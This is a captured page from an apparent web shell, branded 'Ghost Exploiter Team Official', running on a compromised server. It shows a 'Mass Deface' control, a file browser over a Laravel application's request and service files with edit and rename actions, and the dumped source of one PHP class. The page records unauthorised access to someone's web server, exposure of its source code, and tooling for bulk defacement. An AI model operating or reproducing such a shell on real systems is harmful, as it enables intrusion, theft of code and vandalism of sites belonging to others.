Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Domain
/
ArticleToProject
/
Requests
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
ActiveTabMonthService.php
74.889KB
edt
ren
AuthService.php
0.683KB
edt
ren
CreateArticleToProjectR
...
0.976KB
edt
ren
Permission.php
0.239KB
edt
ren
ResponseDto.php
1.147KB
edt
ren
TokenResponse.php
1.604KB
edt
ren
UpdateArticleToProjectR
...
0.166KB
edt
ren
UpdateArticleToProjectR
...
0.166KB
edt
ren
services.php
1.011KB
edt
ren
<?php declare(strict_types=1); namespace App\Responses; use Spatie\LaravelData\Data; class ResponseDto extends Data { public function __construct( public string|null $message = null, public array|null $errors = null, public object|array|null $data = null, public ?bool $status = null, /** @var PaginationDto */ public ?array $pagination = null, public ?bool $paginatable = false, ) { if ($this->status === null) { $this->status = true; } if ($this->paginatable && blank($this->pagination)) { $this->pagination = Dto::dataExample(PaginationDto::class); } if (!$this->paginatable) { unset($this->pagination); } unset($this->paginatable); } public static function example(): array { return [ 'data' => [ 'status' => true, 'message' => null, 'errors' => null, 'data' => [], 'pagination' => null, ], 'status' => true, ]; } }